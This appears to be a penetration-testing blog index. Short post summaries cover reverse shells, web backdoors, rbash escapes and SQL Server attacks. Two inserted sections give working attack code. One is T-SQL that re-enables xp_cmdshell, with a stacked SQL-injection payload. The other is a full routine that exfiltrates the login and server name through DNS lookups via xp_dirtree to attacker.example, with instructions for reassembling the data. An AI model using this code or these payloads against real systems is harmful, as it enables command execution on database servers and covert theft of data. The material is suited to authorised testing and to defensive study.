Finding the NIS Domain Name from Bootparamd
NIS (Network Information Service) is not a particularly common protocol on modern internal networks. This is for good reason, really, considering its security weaknesses. Its presence is often a gift to penetration testers (and probably to attackers too). This blog entry briefly documents one way that the all-important NIS domain name can be found remotely.
Yapscan Update: Scan Unlimited Hosts
Previous versions of yapscan had an annoying habit of consuming large amounts of memory if you tried to do a really big portscan. The latest version calculates the amount of memory that will be required, and if it's above a user-configurable maximum (150MB by default), it breaks the scan into smaller chunks. Download the latest […]
Windows User Enumeration for Time Restricted Accounts
Sid released an advisory about an interesting username enumeration vulnerability over the weekend: notsosecure.com Username enumeration vulnerabilities are a classic mistake that vendors seem fated to repeat. It’s surprising to see one in such a mature product, though. Well spotted, Sid.
php-reverse-shell
This tool is designed for those situations during a pentest where you have upload access to a webserver that’s running PHP. Upload this script to somewhere in the web root then run it by accessing the appropriate URL in your browser. The script will open an outbound TCP connection from the webserver to a host […]
perl-reverse-shell
This tool is designed for those situations during a pentest where you have upload access to a webserver that's running Perl. Upload this script to somewhere in the web root then run it by accessing the appropriate URL in your browser. The script will open an outbound TCP connection from the webserver to a host […]
The Perfect Web Backdoor
I’m sure most pentesters have had cause to use the likes of cmdasp.asp, or cobble together a simple PHP script based around “passthru” or “system”. There’s loads more functionality that would be useful in such backdoors, though. They could be made less dangerous by building in authentication, and more functional by building in database client […]
Breaking out of rbash using scp
I was recently challenged to break out of a restricted shell environment in which the only accessible command was scp.
Enabling xp_cmdshell for SQL Server 2005
It's disappointing to exploit a SQL injection, find you're "sa", then realise they've disabled xp_cmdshell (it is off by default in SQL Server 2005). Fortunately, it's possible to re-enable it quite easily…
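The re-enabling sequence, as an added example that is not taken from the original post: xp_cmdshell is an "advanced" option, so advanced options have to be exposed before it can be switched on, and each sp_configure change only takes effect after RECONFIGURE. It assumes you are running as "sa" or another sysadmin login.

```sql
-- Added example (not the original post's code): re-enabling xp_cmdshell on
-- SQL Server 2005 and later, where it is disabled by default. Needs sysadmin
-- (or ALTER SETTINGS) rights; "sa" has them.

-- 1. xp_cmdshell is an "advanced" option, so expose advanced options first.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;

-- 2. Turn the procedure on and apply the change.
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- 3. Check: config_value and run_value should both read 1.
EXEC sp_configure 'xp_cmdshell';

-- 4. Prove it works (output comes back as a result set, one line per row).
EXEC master..xp_cmdshell 'whoami';

-- When driving this through an injection point you normally have to stack
-- everything into one request, e.g. (hypothetical payload, string context):
-- '; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; --

-- Put it back the way you found it when the test is over:
-- EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
```

Note that changing the configuration is logged in the SQL Server error log, so on a monitored host this is not a quiet step.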
Exfiltrating Data From MS SQL Server Via DNS
Exfiltrating data via Blind SQL Injection vulnerabilities can be slow, or at the very least undesirably noisy. DNS may provide a faster alternative if the target system is connected to the Internet.
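One well-known way to do this, as an added example rather than the post's own code: SQL Server resolves the host part of a UNC path when xp_dirtree (likewise xp_fileexist or xp_subdirs) is called, so data embedded in that hostname is carried to the authoritative DNS server for a domain the attacker controls. The domain attacker.example, the 30-byte chunk size and the sequence-number label layout are assumptions of this example; the post does not say which mechanism it uses.

```sql
-- Added example (not the original post's code): leaking data from SQL Server
-- through DNS lookups triggered by xp_dirtree on a UNC path.
-- attacker.example is a placeholder for a domain whose authoritative name
-- server you run and log. Run as a login allowed to execute xp_dirtree.

DECLARE @data  VARBINARY(1000);
DECLARE @hex   VARCHAR(4000);
DECLARE @chunk VARCHAR(60);
DECLARE @host  VARCHAR(255);
DECLARE @pos   INT;
DECLARE @seq   INT;

-- The value to exfiltrate. Constructed for the example: current login and
-- server name. In a real test this is whatever the injected query returns.
SET @data = CONVERT(VARBINARY(1000), SYSTEM_USER + '|' + @@SERVERNAME);

-- Hex-encode it: DNS labels may only contain letters, digits and '-', and are
-- case-insensitive, so raw bytes or mixed case would not survive the trip.
-- fn_varbintohexstr returns '0x....'; drop the two-character prefix.
-- (On SQL Server 2008+, CONVERT(VARCHAR(4000), @data, 2) does the same.)
SET @hex = SUBSTRING(master.dbo.fn_varbintohexstr(@data), 3, 4000);

-- A single label is limited to 63 characters, so send 60 hex characters
-- (30 bytes) per query. A sequence-number label in front lets the receiver
-- reassemble in order and also defeats resolver caching of repeated chunks.
SET @pos = 1;
SET @seq = 0;
WHILE @pos <= LEN(@hex)
BEGIN
    SET @chunk = SUBSTRING(@hex, @pos, 60);
    -- Backslash is not an escape character in T-SQL, so '\\' is two backslashes.
    SET @host  = '\\' + CONVERT(VARCHAR(10), @seq) + '.' + @chunk + '.attacker.example\share';
    EXEC master..xp_dirtree @host;   -- forces the lookup; the result is irrelevant
    SET @pos = @pos + 60;
    SET @seq = @seq + 1;
END
```

On the receiving side, watch the authoritative server (a packet capture on port 53 is enough), strip the domain suffix, order the queries by the leading sequence label and hex-decode the concatenated chunks. The target itself does not need a direct route to the Internet: the query goes out via its configured resolver, which only has to be able to recurse to your name server. Keep in mind that those queries are visible to every resolver on the path, so this is quieter than thousands of blind-injection requests but not invisible.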